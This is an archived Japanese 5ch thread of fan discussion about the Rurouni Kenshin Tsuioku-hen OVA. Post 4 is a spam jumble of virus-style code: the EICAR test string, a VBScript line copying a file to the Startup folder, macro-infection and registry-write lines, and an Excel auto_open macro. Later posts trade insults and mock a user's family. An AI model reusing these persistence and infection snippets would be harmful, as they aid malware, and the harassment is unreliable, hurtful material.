5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

る ろ う に 剣 心 追 憶 編 第46幕

1 :名無しさん@お腹いっぱい。:2007/11/02(金) 22:32:11 ID:fFxPB0T50
     o                   o
                    o          
          o

    J)   U)     トモエ...メリクリ....
    \J) J)      。        。    
.    c丶 J(っ    メリクリデス..アナタ....   , --、      。
. 。     / ・ \              /:::::::::(○      
     レ'丶__●               ( ,,,,,,,,,,,,,,,,,,)  。     ;;゚;: 
     |  ノハノハ)             | 从从リ !       .,;;ノ;:oゞ;;
  。   トqリ*´-`ル             |!´‐`*|pノ    。  .,;ノo;;:;;ゞ::,.    
     リ!'^ヽVハ        ()      ハ!V/ jハス      ;:.,;ノo;;:;;ゞ::,.;ゞ;:.
     ノ.:::l:: /::.::l:l     ,-♀i-、    ノ:[三ノ ::り   。  <;;;*;;;〇;ゞ;*::o,ゞ
 。    '、_,,つ旦0ノ   ,-|~~⌒~~|-、  O旦と,,__ノ       "゛゛l゛:l″゛"    
     (;;_⌒/フ_,,)  ヽ、ー-‐‐' ノ  (;;:.:.::.::: ..jフ        田田田



【前スレ】 http://anime2.2ch.net/test/read.cgi/ranimeh/1189494567/
【るろ剣AA集】http://www.geocities.co.jp/AnimeComic-Pen/7913/AA/kensin.html
◆基本的にsage推奨
◆OVA追憶編の話題メインで、星霜編TVアニメ漫画ゲーム実写化については関連スレで
◆原作ネタは基本的に該当スレにて行うこと(主に懐漫画板総合スレなど)
◆次スレは基本的に>>950が立てること。立てられない場合は指名を忘れずに

2 :名無しさん@お腹いっぱい。:2007/11/02(金) 23:31:56 ID:???0
ひっそり立っててワロタw

とりあえず>>1乙!!

3 :名無しさん@お腹いっぱい。:2007/11/02(金) 23:37:00 ID:pjJFgs3KO
特別編のラストとスタッフロールだけで泣ける…。
あそこの音楽は神を超えた。


4 :名無しさん@お腹いっぱい。:2007/11/02(金) 23:49:15 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しさん@お腹いっぱい。:2007/11/03(土) 00:04:11 ID:???0
>>1大津!!待ってました!!クリスマス仕様テラGJ!!!

6 :名無しさん@お腹いっぱい。:2007/11/03(土) 00:05:16 ID:???0
>>3
どうしようもないくらい同意だけどsageようぜ。
またあの基地害アンチの固定が荒らしに来る。

7 :名無しさん@お腹いっぱい。:2007/11/03(土) 01:37:07 ID:???0
>>1
トナカイバツかわいすぎwwwww

8 :名無しさん@お腹いっぱい。:2007/11/03(土) 02:55:02 ID:???0
トナカイに頭食われてるように見えるw

9 :名無しさん@お腹いっぱい。:2007/11/03(土) 04:38:43 ID:???0
剣心「サンタクロース……巴が欲しい…」

10 :名無しさん@お腹いっぱい。:2007/11/03(土) 10:24:18 ID:???0
巴「サンタクロースさん……大根が欲しい…」

11 :名無しさん@お腹いっぱい。:2007/11/03(土) 14:29:42 ID:???O
>>10
剣心玉砕w

12 :名無しさん@お腹いっぱい。:2007/11/03(土) 17:03:43 ID:???0
>>3
冒頭の剣心と巴が出会うシーンの音楽と映像のシンクロ率も半端ない

13 :名無しさん@お腹いっぱい。:2007/11/03(土) 20:14:09 ID:???0
クリスマス仕様早すぎじゃまいかw

14 :名無しさん@お腹いっぱい。:2007/11/03(土) 21:58:11 ID:???0
三幕がいい暖和剤になってて良いな

15 :名無しさん@お腹いっぱい。:2007/11/03(土) 23:43:05 ID:???0
映像も演出も音楽も脚本も
全てがパーフェクトなアニメってこれとカーボーイビバップくらい。

16 :名無しさん@お腹いっぱい。:2007/11/04(日) 01:27:57 ID:???0
やっと立ったか……
今度こそ平和に語れますように(−人−)
>>1さん乙です

17 :名無しさん@お腹いっぱい。:2007/11/04(日) 02:53:22 ID:???0
>>1


剣心トナカイかよw

18 :名無しさん@お腹いっぱい。:2007/11/04(日) 12:44:16 ID:???0
織田裕二主演の椿三十郎っていう映画の中で中村玉緒が
「いい刀というのは鞘に収まってるものなんです」っていう台詞があるんだけどパクられた?

19 :名無しさん@お腹いっぱい。:2007/11/04(日) 13:04:09 ID:???0
>>18
違う、パクった

まぁ昔からよくある表現だとは思うが
そういう諺もあるし

20 :名無しさん@お腹いっぱい。:2007/11/04(日) 14:36:06 ID:???0
>>19
椿三十郎のほうが追憶編より先発?

21 :名無しさん@お腹いっぱい。:2007/11/04(日) 15:21:30 ID:???0
>>20
リメイク版については知らないが、「椿三十郎」は白黒映画だぞ?
先発どころではない
てかかなり有名な映画だと思うんだが、黒澤だし

リメイク版は見てないけど、オリジナル版にもそういう台詞があったのは覚えている

22 :名無しさん@お腹いっぱい。:2007/11/04(日) 19:59:54 ID:???0
>>21
へえ〜そうなんだ。オマージュだってやつかね。
でもまあよくある台詞ではあるから一概にそうとも言えないか。
他に追憶編が影響受けてる作品でお勧めあったら教えてくれ

23 :名無しさん@お腹いっぱい。:2007/11/04(日) 21:35:43 ID:???0
とりあえず十一人目の志士を読むといいと思う

24 :名無しさん@お腹いっぱい。:2007/11/04(日) 22:58:38 ID:???0
この前日ハムの優勝速報で追憶編のサントラが使われてた件

25 :名無しさん@お腹いっぱい。:2007/11/05(月) 00:10:05 ID:???0
>>24
なんの関連性も見出せないw

26 :名無しさん@お腹いっぱい。:2007/11/05(月) 01:18:33 ID:???0
>>24
フジ?
フジのスポーツ番組はよく追憶編のBGM垂れ流しにするぞ
おそらくスタッフにファンがいる模様

27 :名無しさん@お腹いっぱい。:2007/11/05(月) 03:53:02 ID:???0
K-1のダイジェストでKOTOWARIが使われてることはよくあるな。

28 :名無しさん@お腹いっぱい。:2007/11/05(月) 20:11:02 ID:???0
警察24時でも頻繁に使われてるぞw

29 :名無しさん@お腹いっぱい。:2007/11/05(月) 20:47:41 ID:???0
>>18
自分と全く同じこと考えてたやつ発見!!!CMであのシーン流れるたびに絶対振り向くw

30 :名無しさん@お腹いっぱい。:2007/11/05(月) 21:44:17 ID:???0
SD剣巴AAのためにクリスマスまでこのスレ残したいな・・


31 :名無しさん@お腹いっぱい。:2007/11/05(月) 22:19:14 ID:???0
しかし二人に訪れた聖夜はたった一度きり…

32 :名無しさん@お腹いっぱい。:2007/11/05(月) 23:16:24 ID:???0
幕末に聖夜も糞もねー
二人にとってはあの半年は毎日が蜜月

33 :名無しさん@お腹いっぱい。:2007/11/05(月) 23:44:20 ID:???0
清里と剣心の決戦何度見ても鳥肌もの…
抜刀斎を見てやはり男は無口なほうがいいと実感

34 :名無しさん@お腹いっぱい。:2007/11/06(火) 00:36:29 ID:???0
抜刀斎>剣心

だよなやっぱ

35 :名無しさん@お腹いっぱい。:2007/11/06(火) 04:26:49 ID:???0
十年の月日は残酷だ
おろ、ござる口調の変人になってしまわれて…

36 :名無しさん@お腹いっぱい。:2007/11/06(火) 12:29:10 ID:???O
>>35
鞘を失って暴走してしまったんだな……

37 :名無しさん@お腹いっぱい。:2007/11/06(火) 17:19:39 ID:???0
むしろ巴を失った悲しみを背負って生きる事でカドが取れたんだよ

38 :名無しさん@お腹いっぱい。:2007/11/06(火) 18:08:13 ID:???O
>>37
自然体の剣心は巴や比古の前で見せる素の姿で
ござる口調のほうが一種の自己防衛に思える
ああやって己を抑えることで周囲と調和を図ってるというか

39 :雪代牛え:2007/11/06(火) 19:57:41 ID:???0
大根でズっこんばっこん・・・ああん^^

40 :神谷ドブサオル:2007/11/06(火) 20:27:51 ID:???0
わたしの前では素を見せない赤毛チビ^^そんなに巴が好きか

41 :名無しさん@お腹いっぱい。:2007/11/06(火) 21:04:55 ID:???0
キッズで再放送するのにスルーかおまいらw


42 :雪代ぶさェ:2007/11/06(火) 21:08:37 ID:???0
変なのが多いですね・・・

43 :名無しさん@お腹いっぱい。:2007/11/06(火) 21:19:58 ID:???0
>>41
KWSK!!!!

44 :名無しさん@お腹いっぱい。:2007/11/06(火) 21:40:19 ID:???0
>>41
OVA?それともアニメのこと?

45 :名無しさん@お腹いっぱい。:2007/11/06(火) 21:56:12 ID:???0
>>41 ソース


46 :名無しさん@お腹いっぱい。:2007/11/06(火) 22:31:02 ID:???O
フタエノキワミ!アッー!

47 :雪代ブタェ:2007/11/06(火) 23:22:14 ID:???0
ル路おたが恥ずかしくなってきた・・・あの吉外の清で・・・

48 :神谷ドブサオル:2007/11/06(火) 23:26:07 ID:???0
【なりきり狸】神谷薫2【総受け狸】
http://etc6.2ch.net/test/read.cgi/charaneta2/1194358340/l50


わたしと代々木の愛の巣。。遊びにきてねみんな☆


49 :緋村アートもえ:2007/11/06(火) 23:46:43 ID:???0
なんかもう・・・この人たちだいじょうぶですか?

50 :緋村アートもえ:2007/11/06(火) 23:55:25 ID:???0
もう本音だしません?

51 :神谷ドブサオル:2007/11/07(水) 00:30:38 ID:???0
薫信者代表代々木がご迷惑かけてすみません。。

52 :緋村アートもえ:2007/11/07(水) 00:34:00 ID:???0
はい、もう迷惑かけないでね^^しゃべらないでね^^かきこまないでね^^巴信者代表より

53 :ニーと萌え信者代表:2007/11/07(水) 00:42:34 ID:???0
です。

54 :神谷ドブサオル信者教祖:2007/11/07(水) 00:48:50 ID:???0
と、部下の薫信者幹部が申しておりますがお気にせずに^^

55 :ニーと萌え信者代表:2007/11/07(水) 00:51:13 ID:???0
むりぽ?

56 :ニーと萌え信者代表:2007/11/07(水) 00:53:58 ID:???0
さあ!!みんなで盛り上げよう!!集え!!巴信者

57 :神谷ドブサオル信者教祖:2007/11/07(水) 00:55:14 ID:???0
和月スレ、最強スレ、燕スレでも演説するからぜひ着てね^^

58 :神谷ドブサオル信者教祖:2007/11/07(水) 00:56:45 ID:???0
るろ剣スレ全部薫教の本部にすることに決めました^^薫信者の命令です

59 :ニーと萌え信者代表:2007/11/07(水) 01:09:15 ID:???0
とも栄光!!信者の合言葉だ!!さあさけぼう!!

60 :ニーと萌え信者代表:2007/11/07(水) 01:20:50 ID:???0
こんな奴にるろけんをわたすな!!巴チャンを護ろう!!

61 :名無しさん@お腹いっぱい。:2007/11/07(水) 01:32:52 ID:???0
完全版スレまで荒らしてる薫信者最低〜

62 :ニーと萌え信者代表:2007/11/07(水) 01:34:17 ID:???0
雪の妖精巴ちゃん

63 :ニーと萌え信者代表:2007/11/07(水) 01:36:00 ID:???0
糞の話題すんな!!でてけ!最低はおまえだ!!スレ汚しが!!

64 :名無しさん@お腹いっぱい。:2007/11/07(水) 02:02:23 ID:???0
>>41
再放送ってことはTV版か?
見る価値ないな

65 :名無しさん@お腹いっぱい。:2007/11/07(水) 08:30:42 ID:???0
追憶編地上派放送まだかよ・・・

66 :名無しさん@お腹いっぱい。:2007/11/07(水) 12:46:49 ID:???O
>>65
ゴールデンであれをやるのは至難だが、
深夜枠なら望みはある。

67 :名無しさん@お腹いっぱい。:2007/11/07(水) 19:01:47 ID:???0
再放送の詳細下さい…

68 :名無しさん@お腹いっぱい。:2007/11/07(水) 19:55:18 ID:???0

「君とはお別れしなくちゃならないけど・・」って台詞はどうにかしてほしい

名シーンが台無し

69 :名無しさん@お腹いっぱい。:2007/11/07(水) 21:29:28 ID:???0
>>68
あの下りは何度見ても号泣してしまう俺は邪道か

70 :名無しさん@お腹いっぱい。:2007/11/07(水) 22:25:39 ID:???0
台詞自体はいいと思うけど如何せん涼風の臭い芝居が……

71 :名無しさん@お腹いっぱい。:2007/11/08(木) 00:48:44 ID:???0
涼風の剣心は嫌いだが
なぜだか涼風の抜刀斉は好き

72 :名無しさん@お腹いっぱい。:2007/11/08(木) 01:58:56 ID:???0
OVAにも「だがしかし!だがしかし!」って入れてほしかった

73 :名無しさん@お腹いっぱい。:2007/11/08(木) 15:35:52 ID:???O
思ったより流行らなかったな>駄菓子菓子

74 :名無しさん@お腹いっぱい。:2007/11/08(木) 18:37:23 ID:???0
駄菓子菓子w

75 :名無しさん@お腹いっぱい。:2007/11/08(木) 20:16:53 ID:???0
追憶編ってOVAも原作も名言多すぎだよな

76 :名無しさん@お腹いっぱい。:2007/11/08(木) 21:15:45 ID:???0
>>75
原作で多くを語らない巴が
OVAだと名台詞吐きまくりで嬉しかった。

77 :名無しさん@お腹いっぱい。:2007/11/08(木) 23:17:57 ID:???0
原作はリアルタイムで「やべぇ、追憶編超おもしれぇ」と毎週楽しみに読んでた思い出がある
消防だったのでその時は気にならなかったが、後で巴が綾波のパクリだったと知って萎えたりしたので
OVAでの変更はそこが一番嬉しかった

OVA版の巴はいい意味でやば過ぎるな、まさに完璧w

78 :名無しさん@お腹いっぱい。:2007/11/09(金) 00:09:29 ID:???0
>>77
男が理想とする女性そのものって感じだよなあ>OVA巴

79 :名無しさん@お腹いっぱい。:2007/11/09(金) 01:16:41 ID:???0
剣心に巴は勿体無い

80 :名無しさん@お腹いっぱい。:2007/11/09(金) 15:05:58 ID:???O
剣心はまだいいが縁に巴は勿体無さすぎる

81 :名無しさん@お腹いっぱい。:2007/11/09(金) 18:46:45 ID:???0
再放送とかいうのは結局釣りだったか

82 :名無しさん@お腹いっぱい。:2007/11/09(金) 23:54:01 ID:???0
追憶編大好き

83 :名無しさん@お腹いっぱい。:2007/11/10(土) 02:58:41 ID:???0
追憶編フィギュア再発希望

84 :名無しさん@お腹いっぱい。:2007/11/10(土) 13:51:00 ID:???0
     ,.――――-、
     ヽ / ̄ ̄ ̄`ヽ、    
      | |  (・)。(・)|
      | |@_,.--、_,>       巴、君を守るでござる
      ヽヽ___ノ          
        /:::::::::::::::::l   /77
       /::::::::::i:i:::::::i,../ / | 
       l:::/::::::::i:i:::、:::/ / |  
       l;;ノ:::::::::::::::l l;.,.,.!  |  
        /::::::::::::::::l/ /  冂 
       /:::::::;へ:::::::l~   |ヌ|
      /:::::/´  ヽ:::l   .|ヌ|  
      .〔:::::l     l:::l   凵
      ヽ;;;>     \;;>


85 :名無しさん@お腹いっぱい。:2007/11/10(土) 22:30:56 ID:???0
追憶編ってバックの背景も神がかってるな・・
下手な日本絵画より良い

86 :名無しさん@お腹いっぱい。:2007/11/10(土) 23:50:40 ID:???0
大津の風景と....大根と...巴さんの笑顔

87 :名無しさん@お腹いっぱい。:2007/11/11(日) 22:03:52 ID:???0
過去スレであった追憶編の年表みたいなももう一度貼ってくれませんか?

88 :名無しさん@お腹いっぱい。:2007/11/11(日) 23:37:48 ID:???0
巴と清里のねんごろ描写が少なくてショボーン
あれじゃ巴がどれだけ清里のことを好いていたのか伝わりにくいよ

89 :名無しさん@お腹いっぱい。:2007/11/12(月) 01:32:56 ID:???0
まあ主役のご両人はあくまで剣心と巴だから仕方ない

90 :名無しさん@お腹いっぱい。:2007/11/12(月) 19:17:26 ID:???0
清里ほど幸薄い男もいないよな…
もし巴と結婚しててもどの道路頭にでも迷ってそう

91 :名無しさん@お腹いっぱい。:2007/11/12(月) 21:21:34 ID:???0
巴タンはアゲマン

92 :名無しさん@お腹いっぱい。:2007/11/13(火) 19:52:12 ID:???0
巴みたいな嫁さんがほしいー
巴みたいな姉さんもほしいー

93 :名無しさん@お腹いっぱい。:2007/11/14(水) 00:04:37 ID:???0
この作品作った人間天才

94 :名無しさん@お腹いっぱい。:2007/11/14(水) 00:15:33 ID:hvK3eOLl0
追憶編のDVDBOXって今はもう手に入れるの不可能ですか?
オクも探し回ってるんだけどぜんぜん見つからないorz

95 :名無しさん@お腹いっぱい。:2007/11/14(水) 00:35:40 ID:???0
>>94
限定発売だったから市販ではもう手に入らない。
オクで出回るのをひたすら待つしかないかと。

96 :名無しさん@お腹いっぱい。:2007/11/14(水) 01:40:43 ID:???0
ボックスは先日オクで5万で見かけた@セル画付き

97 :名無しさん@お腹いっぱい。:2007/11/14(水) 06:32:34 ID:???0
質問なんですが
OVAだと巴が自分の手で一文字に傷を付けてるんだけどこれは何を意味するのかな?
清里の復讐の為かそれとも・・・・・・
あと最期の「あなた・・・」ってセリフも剣心に対して言ったのかそれとも清里に対して言ったのか双方に言ったのか・・・・・
今でも分からん。

98 :名無しさん@お腹いっぱい。:2007/11/14(水) 12:37:04 ID:???O
>>97
二人に対して言ったものだと思う
巴の中では剣心と清里は完全に同化してたんじゃないかと

99 :名無しさん@お腹いっぱい。:2007/11/14(水) 17:52:33 ID:???0
>>97−98
違うんじゃないかな?
多分、清里の付けた刀傷に交錯する様に新たな刀傷を付ける事で、
呪いを封じたかったように思われるが。
「あなた」も剣心に対し、言っているのでは。

100 :名無しさん@お腹いっぱい。:2007/11/14(水) 18:20:10 ID:???0
>>98-99
なるほど最後清里とのやり取りがどんなのか分かれば傷をつけた意味と最期のあなたとは誰か分かるんだろうね。
だけど何かこの答えがでない曖昧な感じイイ!それと必殺技もなしに無表情のまま人を斬っていく剣心もリアルでイイ。
このアニメは背景も綺麗だよね。

あとスレチですが星霜編ってYOUTOUBEで全部見れる?未見なので見たいのだがレンタル店に置いてない・・・・・・

101 :名無しさん@お腹いっぱい。:2007/11/14(水) 18:32:14 ID:???0
ニコニコになら少し前にあったけど消されちゃった

OVAるろ剣はどちらも名作なのでぜひ見て欲しい

102 :名無しさん@お腹いっぱい。:2007/11/14(水) 19:22:35 ID:???0
>>100
星霜編はクソだから見なくていいよ
それとスレ違い

103 :名無しさん@お腹いっぱい。:2007/11/14(水) 19:30:58 ID:hvK3eOLl0
>>98
仇を取れなくてごめんなさいあなた(清里)
愛してくれたのに欺いてごめんなさいあな(剣心)

両方の意味通ってる感じがするな。

巴が最期の力で頬に傷を付けたのも清里の無念の傷を断ち
剣心の罪を昇華させたって感じだ。

天秤にすら掛けられずに愛する人のためによく頑張ったな巴さん……

104 :名無しさん@お腹いっぱい。:2007/11/14(水) 20:01:39 ID:eaSA7UHbO
薫が傷を見て「やっと消えたね」で泣いた…。

105 :名無しさん@お腹いっぱい。:2007/11/14(水) 20:31:38 ID:???0
糞が傷を見て「やっと消えたね」・・
糞って喋れるのか・・

106 :名無しさん@お腹いっぱい。:2007/11/14(水) 20:33:05 ID:???O
ワロスw

107 :名無しさん@お腹いっぱい。:2007/11/14(水) 20:35:59 ID:???0
星霜スレってまだ復活してないの?

108 :名無しさん@お腹いっぱい。:2007/11/14(水) 20:42:47 ID:???0
三幕の下りが最高すぎるな
特に一夜を共にする場面
乱れる巴を前に人斬りから一人の男になる剣心タマンネ

109 :名無しさん@お腹いっぱい。:2007/11/14(水) 20:47:47 ID:???0
思春期の二人を同じ屋根の下に同棲させる桂イケズ///

110 :名無しさん@お腹いっぱい。:2007/11/14(水) 21:11:45 ID:???O
>>103
しっかり最後の告白で「二人目のあなた」って言ってるしな。
やはり巴の言う「あなた」とは剣心と清里二人を指しているんだろう。

111 :ニーと萌え信者代表:2007/11/14(水) 21:12:00 ID:???0
やはりと萌え信者のかちだね

112 :緋村アートもえ:2007/11/14(水) 21:19:00 ID:???0
友達ガと燃えをみてきつねのひと?とまちがえた。やぱにてるんだな

113 :神谷ブタオル:2007/11/14(水) 22:02:17 ID:???0
>>107
立てていいわよ^^容赦なしに埋めてあげるブフフフフw

114 :名無しさん@お腹いっぱい。:2007/11/14(水) 22:36:21 ID:???0
OVAは追憶編以外なかったことになってる

115 :名無しさん@お腹いっぱい。:2007/11/14(水) 22:38:26 ID:???0
るろ剣のシリーズの中で大人になっても見返したいと思えるのは追憶編くらいだな…
ここまで時代性を問わない作品って凄い

116 :名無しさん@お腹いっぱい。:2007/11/14(水) 22:58:01 ID:???0
>>115
今見てもとても10年前の作品とは思えないね。
こういう不朽の快作をもっと世に送り出してほしいよディーンさん。

117 :名無しさん@お腹いっぱい。:2007/11/15(木) 00:08:04 ID:???0
剣心がボロボロになりながらも朦朧と巴の名を呟くシーン泣ける(T^T)

118 :名無しさん@お腹いっぱい。:2007/11/15(木) 01:15:11 ID:???0
OVAはどちらも名作


…の割りにどちらも日本じゃ知名度低すぎ、どうなってるんだ

119 :名無しさん@お腹いっぱい。:2007/11/15(木) 01:36:23 ID:???0
追憶編は海外じゃ圧倒的人気
日本でもその年の年間OVA売上2位だったし

120 :名無しさん@お腹いっぱい。:2007/11/15(木) 01:43:56 ID:???0
でも海外で人気なのは知ってるが周りで知ってる人間少ないんだよなぁ
もっと評価されていいと思うんだが、どうにもマイナー臭が漂う

121 :名無しさん@お腹いっぱい。:2007/11/15(木) 02:45:38 ID:???O
るろ剣ってシシオのあとのキリシタンの話でつまらなくなったよな。

122 :名無しさん@お腹いっぱい。:2007/11/15(木) 03:46:54 ID:???0
>>101-102
スレチは承知なんですが他に聞けるスレがなくて・・・・・・・
ここで全部見れるかな?ttp://youtubech.com/tag/Seisou%20hen%20?s=
星霜編詳しくないので途中話が抜けてたりして。
>>103-110
原作だと私が”愛した2人目のあなたさようならだけどOVAだと私を”愛してくれた2人目のあなたさようなら
なんだよな。だから巴が最期に呟くあなたも剣心、清里どちらかそれとも双方に対する問いかけなのか曖昧になってるよね。
ただそこがいいんだよね。それに宵里山での巴は幻想的というか背景の綺麗さと相まって思わず見惚れてしまった。
髪をとかす仕草とか夜空を寂しげに見つめるシーンとかは特にね。




123 :名無しさん@お腹いっぱい。:2007/11/15(木) 12:29:12 ID:???O
巴にとっての貴方は剣心だけであっほしい…
巴を呼び捨てで呼べるのも剣心だけであるように

124 :名無しさん@お腹いっぱい。:2007/11/15(木) 18:46:47 ID:???0
これは既出かな?
ちょいと驚いた。
ttp://www.nicovideo.jp/watch/sm1424526

125 :名無しさん@お腹いっぱい。:2007/11/15(木) 19:23:12 ID:???0
>>124
見れない・・orz
中身解説頼む

126 :名無しさん@お腹いっぱい。:2007/11/15(木) 20:04:28 ID:???0
>>125
海外のアニメ人気ランキング追憶1位


だから、日本と海外のこの温度差は一体…orz
本編との雰囲気が違いすぎるからか?

127 :名無しさん@お腹いっぱい。:2007/11/15(木) 20:20:18 ID:???0
>>124
追憶編すげええwwwwwwwwwww

128 :名無しさん@お腹いっぱい。:2007/11/15(木) 20:21:35 ID:???0
>>126
日本でもかなり高い評価得てるよ
それこそTV版のボロ糞な評価とは比べ物にならないほど
OVAだから知名度が低いのは仕方ない

129 :名無しさん@お腹いっぱい。:2007/11/15(木) 20:26:55 ID:???0
>>125
数年前のランキングでは5位くらいだったのに・・
ここにきて新たに再評価されはじめた?w

130 :122:2007/11/15(木) 20:34:19 ID:???0
追憶編すげえええええwwww
アニメでもちょい古いがカリオストロと並んで好きだ。
絵も綺麗だし闇乃武の親方もただの悪い奴ではなく悟りを開いてるというか人間の業の深さを承知してるというか
味のあるキャラになってました。

あとスレチすまんが星霜スレはないの?
重複質問だがttp://youtubech.com/tag/Seisou%20hen%20?s=に星霜編全部ありますか?
近頃OVA剣心にハマった初心者なので質問ばかりスマソ。

131 :名無しさん@お腹いっぱい。:2007/11/15(木) 20:37:55 ID:???0
>>128
勿論見た人の評価はみんなそうなんだけどね…
OVAということを入れても完成度の割りに知名度低すぎだと思う

TV版も原作と同じところではそこそこの評価受けてる気がする
オリジナル編はボロクソだけどw

132 :名無しさん@お腹いっぱい。:2007/11/15(木) 21:26:12 ID:???0
>TV版も原作と同じところではそこそこの評価受けてる気がする

つまりるろ剣ヲタ限定でしか評価されてないということか・・。

追憶編はOVAにしてら知名度あるほうだよ。
年間ランキングなんてみるとカーボーイビバップと並んでるし。

133 :名無しさん@お腹いっぱい。:2007/11/15(木) 21:42:34 ID:???0
というより単純にストーリー考える人にセンス無かったんだろうね
今思い出してもTV版の本編とオリジナルとの落差はすさまじかったな

追憶星霜は今からでもそれぞれ一つにまとめて劇場版に・・・って無理だよな・・・orz

134 :名無しさん@お腹いっぱい。:2007/11/15(木) 21:59:09 ID:???0
いい加減星霜編の話は自重しろ

135 :名無しさん@お腹いっぱい。:2007/11/15(木) 23:28:43 ID:???0
OVAという形態自体が「世間では」知られてないということ。
知る人ぞ知る、という立ち位置にしとこうよ。
下手にブームにでもなって劣化二次創作乱発されるよりよっぽどいいわ。

136 :名無しさん@お腹いっぱい。:2007/11/16(金) 08:46:22 ID:???O
>>125
なんか嬉しいな

137 :名無しさん@お腹いっぱい。:2007/11/16(金) 20:13:07 ID:???0
いっそハリウッドで実写化してしまえばいい

138 :名無しさん@お腹いっぱい。:2007/11/16(金) 20:18:33 ID:???0
追憶・星霜編両方とも濡れ場が生々しいというかリアルだ。
あとようつべで星霜編・追憶編全部見れるの?見れるっぽいのだが・・・・・・・

139 :名無しさん@お腹いっぱい。:2007/11/16(金) 23:45:10 ID:mlPBVq+U0
>>137
なら配役は国際的に
剣心=金城武
巴=チャンツイー
で頼む

140 :名無しさん@お腹いっぱい。:2007/11/17(土) 00:27:47 ID:???0
追憶編なら実写化とかリアルにありえそうで怖い

141 :名無しさん@お腹いっぱい。:2007/11/17(土) 01:24:21 ID:???O
>>139

あり!!

142 :名無しさん@お腹いっぱい。:2007/11/17(土) 02:10:41 ID:???0
>>139
巴はいいけど剣心がゴツイw

143 :名無しさん@お腹いっぱい。:2007/11/17(土) 03:17:45 ID:???0
>>137
ドラゴンボールが米で実写化決定したらしいしね。
ファンの心理は複雑なんだろうなあ。

144 :名無しさん@お腹いっぱい。:2007/11/17(土) 03:21:46 ID:???O
ヒッテンミツルギスタイル!お取り寄せー!

145 :名無しさん@お腹いっぱい。:2007/11/17(土) 06:15:58 ID:???0
追憶編の剣心と巴は美しすぎるお・・
実写化なんて不可能に等しい

146 :名無しさん@お腹いっぱい。:2007/11/17(土) 06:53:46 ID:nQuJZgEk0
新参者ですがよろしく!!
OVAの巴さんにベタ惚れしました
仲間に入れてください

147 :名無しさん@お腹いっぱい。:2007/11/17(土) 07:17:42 ID:???O
あたしはやっぱり剣心に惚の字じゃ。何あの目。歯がゆい。DVDが欲すぃ。
るろ剣に出会わせてくれた兄者に感謝

148 :名無しさん@お腹いっぱい。:2007/11/17(土) 11:48:29 ID:???0
>>146
いらしゃ〜い
一緒に巴タンを愛でようぜ

149 :名無しさん@お腹いっぱい。:2007/11/17(土) 12:27:06 ID:aeth4gj0O
巴は理想の嫁

150 :名無しさん@お腹いっぱい。:2007/11/17(土) 12:43:48 ID:???0
追憶編の濡れ場はエロいのに綺麗でどこか泣けるところが凄い

151 :名無しさん@お腹いっぱい。:2007/11/17(土) 12:58:03 ID:???0
精巣の濡れ場はもはやグロ

152 :名無しさん@お腹いっぱい。:2007/11/17(土) 13:22:26 ID:???0
るろうに剣心―梅毒編―

153 :名無しさん@お腹いっぱい。:2007/11/17(土) 14:35:19 ID:???0
<<150-153
トイレで血が出てくるのは生理かな?
あと星霜編あれ梅毒なのか?最終的に記憶喪失&傷消えて死亡だたが。

154 :名無しさん@お腹いっぱい。:2007/11/17(土) 14:41:18 ID:???0

>>150-153へのレスね。
星霜編は剣心が拒んでるのに無理迫るから濡れ場グロいんじゃないか?

155 :名無しさん@お腹いっぱい。:2007/11/17(土) 14:56:16 ID:???0
×濡れ場
○逆レイプ

156 :名無しさん@お腹いっぱい。:2007/11/17(土) 15:54:12 ID:???0
>>153-155
清掃信者が大学生活板からこんな板に流れてこないでくれる?
なんで専用スレいかないの?
スレタイも読めないド低脳消えろ

157 :名無しさん@お腹いっぱい。:2007/11/17(土) 15:55:16 ID:ddnBuy/T0
NGワード推薦

星霜編

158 :名無しさん@お腹いっぱい。:2007/11/17(土) 15:58:13 ID:???0
>>157
それ次からテンプレ入れてほしい。

159 :名無しさん@お腹いっぱい。:2007/11/17(土) 16:06:58 ID:???0
専用スレに誘導してくれ。
スマンかった。

160 :名無しさん@お腹いっぱい。:2007/11/17(土) 16:08:43 ID:???0
↑専用スレは星霜の方でつ。

161 :名無しさん@お腹いっぱい。:2007/11/17(土) 16:15:33 ID:???0
>>159-160
自分で探して
ないなら自分で立てるかして

162 :名無しさん@お腹いっぱい。:2007/11/17(土) 16:44:53 ID:???0
フタエノキワミ、アッー!

163 :ニーと萌え信者代表:2007/11/17(土) 20:27:42 ID:???0
代々木はもう敗北だわw

164 :神谷ドブサオル:2007/11/17(土) 20:44:29 ID:???O
自分に敗北したんですか代々木さん???相変わらずトンチンカンおばさん^^

165 :ニーと萌え信者代表:2007/11/17(土) 20:49:55 ID:???0
代々木ガ敗北して現実逃避中^^

166 :ニーと萌え信者代表:2007/11/17(土) 20:54:06 ID:???0
代々木の家の父さんにあった・・・リストラちゅうだそうだ

167 :ニーと萌え信者代表:2007/11/17(土) 20:55:30 ID:???0
母サンは主婦でにーとだそうだ・・・代々木をかまってくれないそうだ

168 :緋村アートもえ:2007/11/17(土) 20:57:31 ID:???0
代々木サン・・・たんじょうびおめでとう^^

169 :緋村アートもえ:2007/11/17(土) 20:58:40 ID:???0
あなたはもう立派な親父・・・早く妹返してください。このロリコン

170 :神谷ドブサオル:2007/11/17(土) 21:17:37 ID:???O
代々木さんね自虐ネタ秋田わよ^^

171 :神谷ドブサオル:2007/11/17(土) 21:18:54 ID:???O
代々木の不幸自慢なんて誰も興味なし!!!

